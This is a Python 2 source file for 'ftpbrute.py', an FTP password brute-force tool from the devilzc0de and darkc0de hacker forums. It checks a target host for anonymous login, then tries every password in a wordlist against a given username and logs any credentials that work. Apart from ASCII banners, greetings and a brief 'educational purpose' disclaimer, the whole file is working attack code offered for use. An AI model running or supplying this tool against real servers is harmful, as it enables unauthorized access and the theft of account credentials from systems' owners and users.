#!/usr/bin/python # -*- coding: utf-8 -*- ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # This is ftp brute force tools [Updated]. # This was written for educational purpose and pentest only. Use it at your own risk. # Update : More efficient # : prevent loss added # : Anonymous checker added # VISIT : http://www.devilzc0de.com # CODING BY : gunslinger_ # EMAIL : gunslinger.devilzc0de@gmail.com # TOOL NAME : ftpbrute.py v1.5 # Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member # Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family # Greetz : all member of jasakom.com, jatimcrew.com # Special i made for jasakom member and devilzc0de family # Please remember... your action will be logged in target system... # Author will not be responsible for any damage !! # Use it with your own risk import sys import time import os from ftplib import FTP if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': SysCls = 'clear' elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos': SysCls = 'cls' else: SysCls = 'unknown' log = "ftpbrute.log" face = ''' .___ .__ .__ _______ .___ __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ \/ \/ \/ \/ \/ \/ \/ \/ \/ http://www.devilzc0de.com by : gunslinger_ ftpbrute.py version 1.0 Brute forcing ftp target Programmmer : gunslinger_ gunslinger[at]devilzc0de[dot]com _____________________________________________________________________________________________________________________________________________ ''' option = ''' Usage: ./ftpbrute.py [options] Options: -t, --target | Target to bruteforcing -u, --user | User for bruteforcing -w, --wordlist | Wordlist used for bruteforcing -h, --help | print this help Example: ./ftpbrute.py -t -u root -w wordlist.txt ''' file = open(log, "a") def MyFace() : os.system(SysCls) print face file.write(face) def HelpMe() : MyFace() print option file.write(option) sys.exit(1) for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-u' or arg.lower() == '--user': user = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-h' or arg.lower() == '--help': HelpMe() elif len(sys.argv) <= 1: HelpMe() def checkanony() : try: print "\n[+] Checking for anonymous login\n" ftp = FTP(hostname) ftp.login() ftp.retrlines('LIST') print "\n[!] Anonymous login successfuly !\n" ftp.quit() except Exception, e: print "\n[-] Anonymous login unsuccessful...\n" pass def BruteForce(word) : sys.stdout.write ("\r[?]Trying : %s " % (word)) sys.stdout.flush() file.write("\n[?]Trying :"+word) try: ftp = FTP(hostname) ftp.login(user, word) ftp.retrlines('list') ftp.quit() print "\n\t[!] Login Success ! " print "\t[!] Username : ",user, "" print "\t[!] Password : ",word, "" print "\t[!] Hostname : ",hostname, "" print "\t[!] Log all has been saved to",log,"\n" file.write("\n\n\t[!] Login Success ! ") file.write("\n\t[!] Username : "+user ) file.write("\n\t[!] Password : "+word ) file.write("\n\t[!] Hostname : "+hostname) file.write("\n\t[!] Log all has been saved to "+log) sys.exit(1) except Exception, e: #print "[-] Failed" pass except KeyboardInterrupt: print "\n[-] Aborting...\n" file.write("\n[-] Aborting...\n") sys.exit(1) MyFace() print "[!] Starting attack at %s" % time.strftime("%X") print "[!] System Activated for brute forcing..." print "[!] Please wait until brute forcing finish !\n" file.write("\n[!] Starting attack at %s" % time.strftime("%X")) file.write("\n[!] System Activated for brute forcing...") file.write("\n[!] Please wait until brute forcing finish !\n") checkanony() try: preventstrokes = open(wordlist, "r") words = preventstrokes.readlines() count = 0 while count < len(words): words[count] = words[count].strip() count += 1 except(IOError): print "\n[-] Error: Check your wordlist path\n" file.write("\n[-] Error: Check your wordlist path\n") sys.exit(1) print "\n[+] Loaded:",len(words),"words" print "[+] Server :",hostname print "[+] User :",user print "[+] BruteForcing...\n" for word in words: BruteForce(word.replace("\n","")) file.close()